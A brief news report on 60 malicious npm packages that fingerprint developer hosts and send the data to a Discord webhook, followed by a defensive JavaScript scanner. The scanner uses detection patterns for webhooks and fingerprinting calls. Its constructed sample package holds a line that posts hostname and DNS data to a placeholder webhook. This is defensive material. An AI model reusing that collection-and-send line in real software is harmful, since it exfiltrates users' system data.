Security firm Socket discovered an active campaign targeting developers through 60 malicious NPM packages that steal system data when installed. Over two weeks, threat actors published packages containing scripts that collect hostnames, IP addresses, DNS servers, and directory paths, sending everything to a Discord webhook.
The packages have been downloaded over 3,000 times across Windows, Linux, and macOS systems. Three NPM accounts published 20 packages each, all containing identical fingerprinting code designed to evade detection.
Socket warns this data helps attackers map internal developer networks to public infrastructure, enabling future supply chain attacks and targeted intrusions.
Source: SecurityWeek
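
One way to triage an unpacked package for the behaviour described above, as an added example that is not Socket's tooling or code from the reported packages. It assumes the collection code is started by an npm lifecycle script (the report says only "when installed") and that it uses the Node.js calls named in the patterns; the sample packages are constructed.

```javascript
// Added example: static triage of an unpacked npm package for install-time
// host fingerprinting combined with a Discord webhook destination.
const LIFECYCLE = ['preinstall', 'install', 'postinstall'];
const WEBHOOK_RE = /https:\/\/(?:canary\.|ptb\.)?discord(?:app)?\.com\/api\/webhooks\/[\w-]+\/[\w-]+/i;
const FINGERPRINT_RES = { // assumed indicators, one per data type in the report
  hostname: /\bos\.hostname\s*\(/,
  interfaces: /\bos\.networkInterfaces\s*\(/,
  dnsServers: /\bdns\.getServers\s*\(/,
  paths: /\b(?:os\.homedir\s*\(|process\.cwd\s*\(|__dirname\b)/,
};

// pkg = { manifest: <parsed package.json>, files: { relativePath: sourceText } }
function auditPackage(pkg) {
  const scripts = pkg.manifest.scripts || {};
  const hooks = LIFECYCLE.filter((name) => typeof scripts[name] === 'string');
  // Files named in a lifecycle command run automatically during `npm install`.
  const installFiles = Object.keys(pkg.files).filter((file) =>
    hooks.some((name) => scripts[name].includes(file)));
  const findings = [];
  for (const [file, text] of Object.entries(pkg.files)) {
    const signals = Object.keys(FINGERPRINT_RES).filter((k) => FINGERPRINT_RES[k].test(text));
    const webhook = WEBHOOK_RE.test(text);
    if (!webhook && signals.length === 0) continue;
    findings.push({ file, runsAtInstall: installFiles.includes(file), webhook, signals });
  }
  // Highest risk: install-time code that fingerprints the host and names a webhook.
  const verdict = findings.some((f) => f.runsAtInstall && f.webhook && f.signals.length > 0)
    ? 'block'
    : hooks.length > 0 || findings.length > 0 ? 'review' : 'pass';
  return { name: pkg.manifest.name, hooks, findings, verdict };
}

// Constructed sample packages (names, paths and webhook URL are placeholders).
const SAMPLES = [
  { manifest: { name: 'constructed-suspicious', scripts: { postinstall: 'node scripts/setup.js' } },
    files: { 'scripts/setup.js':
      "const h = os.hostname(); const d = dns.getServers();\n" +
      "post('https://discord.com/api/webhooks/000000/PLACEHOLDER', { h, d });" } },
  { manifest: { name: 'constructed-native-addon', scripts: { install: 'node-gyp rebuild' } },
    files: { 'index.js': 'module.exports = require("./build/Release/addon");' } },
  { manifest: { name: 'constructed-plain', scripts: { test: 'node test.js' } },
    files: { 'index.js': 'module.exports = (a, b) => a + b;' } },
];

function auditAll() { return SAMPLES.map(auditPackage); }
```

String matching of this kind misses obfuscated or dynamically assembled code, so a `pass` verdict is not a clean bill of health. Running `npm install --ignore-scripts` in CI and on build hosts keeps lifecycle hooks from executing at all.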